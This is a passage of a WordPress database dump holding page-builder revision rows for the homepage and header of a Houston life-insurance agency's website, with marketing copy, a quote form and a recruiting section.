global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-04 12:59:16','2023-04-04 12:59:16','',138,'http://cmdev-site1.com/?p=780',0,'revision','',0),(772,3,'2023-04-04 12:49:28','2023-04-04 12:49:28','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h3 style=\"text-align: center;\">Join Our Team!</h3>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-04 12:49:28','2023-04-04 12:49:28','',138,'http://cmdev-site1.com/?p=772',0,'revision','',0),(773,3,'2023-04-04 12:50:37','2023-04-04 12:50:37','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-04 12:50:37','2023-04-04 12:50:37','',138,'http://cmdev-site1.com/?p=773',0,'revision','',0),(769,3,'2023-04-04 12:20:19','2023-04-04 12:20:19','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-04 12:20:19','2023-04-04 12:20:19','',138,'http://cmdev-site1.com/?p=769',0,'revision','',0);
INSERT INTO `wpfi_posts` VALUES (701,1,'2023-04-03 23:18:09','2023-04-03 23:18:09','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"417.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px||62px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-03 23:18:09','2023-04-03 23:18:09','',528,'http://cmdev-site1.com/?p=701',0,'revision','',0),(687,1,'2023-04-03 23:02:53','2023-04-03 23:02:53','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"417.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future 